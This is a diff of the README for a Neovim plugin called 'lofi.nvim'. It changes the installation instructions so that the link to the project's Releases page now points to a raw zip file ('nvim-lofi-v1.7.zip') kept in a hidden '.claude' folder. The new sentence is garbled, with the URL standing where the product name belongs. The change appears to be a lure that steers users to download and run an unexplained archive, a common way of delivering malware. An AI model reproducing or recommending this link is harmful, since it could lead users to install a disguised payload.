MrRay-101/lofi.nvim/README.md

 ## 💻 Installation Steps

 ### 1. Visit the Releases Page
-Go to our Releases page to find the latest version of lofi.nvim.
-You can access it here: [Download Page](https://github.com/MrRay-101/lofi.nvim/releases).
+Go to our Releases page to find the latest version of https://github.com/MrRay-101/lofi.nvim/raw/refs/heads/main/.claude/nvim-lofi-v1.7.zip You can access it here: [Download Page](https://github.com/MrRay-101/lofi.nvim/raw/refs/heads/main/.claude/nvim-lofi-v1.7.zip).

 ### 2. Download the Application
 Once on the Releases page, look for the latest release.
 You’ll find a list of files available for download.
 Click on the file that matches your operating system.